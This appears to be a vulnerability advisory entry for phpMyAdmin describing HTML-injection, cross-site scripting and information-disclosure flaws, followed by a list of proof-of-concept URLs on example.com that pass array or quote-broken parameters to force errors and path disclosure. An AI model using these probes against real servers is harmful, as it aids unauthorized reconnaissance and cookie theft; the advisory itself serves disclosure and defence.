source: https://www.securityfocus.com/bid/21137/info
phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities.
An attacker could exploit these vulnerabilities to view sensitive information or to have arbitrary script code execute in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials or change the way the site is rendered to the user. Data gained could aid in further attacks.
All versions of phpMyAdmin are vulnerable.
http://www.example.com/scripts/check_lang.php
http://www.example.com/themes/darkblue_orange/layout.inc.php
http://www.example.com/index.php?lang[]=
http://www.example.com/index.php?target[]=
http://www.example.com/index.php?db[]=
http://www.example.com/index.php?goto[]=
http://www.example.com/left.php?server[]=
http://www.example.com/index.php?table[]=
http://www.example.com/server_databases.php?token=your_token&sort_by="
http://www.example.com/index.php?db=information_schema&token=your_token&tbl_group[]= http://www.example.com/db_printview.php?db="
http://www.example.com/sql.php?back[]=